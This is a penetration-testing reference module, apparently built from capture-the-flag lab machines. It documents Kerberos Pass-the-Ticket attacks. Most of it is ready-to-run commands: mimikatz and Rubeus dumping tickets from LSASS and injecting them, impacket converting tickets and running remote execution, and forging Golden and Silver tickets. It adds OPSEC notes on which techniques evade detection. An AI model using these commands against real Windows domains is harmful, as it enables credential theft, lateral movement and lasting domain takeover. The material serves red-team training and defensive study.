Back to All Modules

Pass-the-Ticket (PTT)

#Overview

Pass-the-Ticket enables authentication to Kerberos services by reusing stolen Kerberos tickets (TGTs and service tickets/TGS) from a compromised host. Unlike PTH, PTT does not require the user's NTLM hash and works against Kerberos-only services. Tickets are stored in memory (LSASS), and tools like Mimikatz and Rubeus can export them for reuse on attacker-controlled systems.

#Prerequisites

  • Administrator/SYSTEM access on the compromised host (to extract tickets)
  • Kerberos tickets for the target user/service
  • Time synchronization with the domain controller (within 5 minutes)
  • mimikatz, Rubeus (Windows), or impacket-ticketConverter (Linux)

#Exploitation / Execution

#1. Exporting Tickets

Mimikatz (from elevated Windows shell)

mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export           # Export all tickets to .kirbi files
POWERSHELL

Tickets are saved in the current directory with .kirbi extension. Look for:

  • krbtgt files: TGT (Ticket Granting Ticket) -- highest value
  • Service tickets: for specific services (MSSQLSvc, HTTP, CIFS, HOST, LDAP)

Rubeus (from Windows)

.\Rubeus.exe dump                                 # Dump all tickets
.\Rubeus.exe dump /service:krbtgt /nowrap         # Extract TGT only
.\Rubeus.exe triage                               # List all tickets in memory
.\Rubeus.exe dump /luid:0x12345                   # Dump tickets for specific session
POWERSHELL

#2. Importing Tickets

Mimikatz

mimikatz # kerberos::ptt <ticket_file>.kirbi       # Inject ticket into current session
# After injection, use native tools:
dir \\DC\C$                                        # Access via SMB with injected ticket
POWERSHELL

Rubeus

.\Rubeus.exe ptt /ticket:<base64_ticket>           # Inject from base64-encoded ticket
POWERSHELL

#3. Ticket Conversion (Linux <-> Windows)

Convert .kirbi to .ccache (Mimikatz -> Linux)

impacket-ticketConverter ticket.kirbi ticket.ccache
BASH

Convert .ccache to .kirbi (Linux -> Mimikatz)

impacket-ticketConverter ticket.ccache ticket.kirbi
BASH

#4. Using Tickets on Linux

export KRB5CCNAME=/path/to/ticket.ccache           # Set ticket path
# Now use impacket tools with -k for Kerberos auth
impacket-psexec.py <domain>/<target> -k -no-pass
impacket-wmiexec.py <domain>/<target> -k -no-pass
impacket-mssqlclient -k <target>                   # Kerberos auth to MSSQL
BASH

The -k flag tells impacket to use Kerberos authentication from the KRB5CCNAME cache.

#5. Golden Ticket (Forged TGT)

A Golden Ticket is a forged TGT signed with the KRBTGT account hash. It grants access to any service in the domain:

# Requires: KRBTGT NTLM hash, domain SID, domain FQDN
mimikatz # kerberos::golden /domain:<domain> /sid:<SID> /krbtgt:<KRBTGT_HASH> /user:Administrator /id:500 /ticket:golden.kirbi
mimikatz # kerberos::ptt golden.kirbi
POWERSHELL

Golden Tickets are valid for 10 years by default, making them potent persistence mechanisms.

#6. Silver Ticket (Forged Service Ticket)

A Silver Ticket is forged for a specific service, signed with the service account's hash:

# Requires: service account NTLM hash, domain SID, service SPN
# For MSSQL service
mimikatz # kerberos::golden /domain:<domain> /sid:<SID> /target:<FQDN> /service:MSSQLSvc /rc4:<NTLM_HASH> /user:Administrator /ticket:mssql.kirbi
mimikatz # kerberos::ptt mssql.kirbi
POWERSHELL

Silver Tickets are stealthier than Golden Tickets because they are validated by the service, not the DC.

Impacket ticketer (Silver Ticket alternative)

impacket-ticketer -nthash <NT_HASH> -domain-sid <DOMAIN_SID> -domain <domain> -dc-ip <DC_IP> -spn <SPN> Administrator
# e.g.:
impacket-ticketer -nthash 1443EC19DA4DAC4FFC953BCA1B57B4CF -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -dc-ip dc.sequel.htb -spn nonexistent/DC.SEQUEL.HTB Administrator

export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient -k dc.sequel.htb
BASH

#Ticket Lifecycle Considerations

PropertyTGTService Ticket (TGS)
Lifetime10 hours (default)10 hours
RenewalUp to 7 daysRenewed with new TGT
ScopeRequest any serviceAccess specific service only
Validated byKDC (DC)Service itself

#Common Pitfalls

  • Warning: Ticket expiration -- monitor ticket lifetime and renew before expiry
  • Warning: Time skew -- Kerberos requires attacker clock within 5 minutes of DC: sudo ntpdate -u <DC_IP>
  • Warning: Ticket export requires elevated privileges (SYSTEM or Administrator)
  • Warning: Golden Tickets are NOT affected by password changes; KRBTGT hash must be reset to invalidate them

#OPSEC Considerations

  • Shield: Ticket export from LSASS generates the same detections as credential dumping (Event ID 4663)
  • Shield: Golden Ticket usage is detectable through ATA/Defender for Identity (anomalous TGT creation)
  • Shield: Silver Ticket usage is harder to detect because validation happens at the service, not DC
  • Shield: Ticket injection into an existing session does not create new Windows logon events

#Post-Exploitation Value

  • TGT provides request access to any service in the domain
  • Service tickets enable targeted access to specific services (MSSQL, HTTP, CIFS)
  • Golden Ticket provides indefinite domain persistence if KRBTGT is not reset
  • Ticket reuse across systems enables lateral movement without password knowledge

#Cross-References

#Tool References

ToolLink
mimikatzhttps://github.com/gentilkiwi/mimikatz
Rubeushttps://github.com/GhostPack/Rubeus
impackethttps://github.com/fortra/impacket
ticketer (impacket)Part of impacket suite

#Source Machines

  • Sauna (Easy, AD) - DCSync attack using replication privileges
  • Escape (Medium, AD) - Silver Ticket for MSSQL service access as Administrator
  • Flight (Hard, AD) - Rubeus for machine account ticket extraction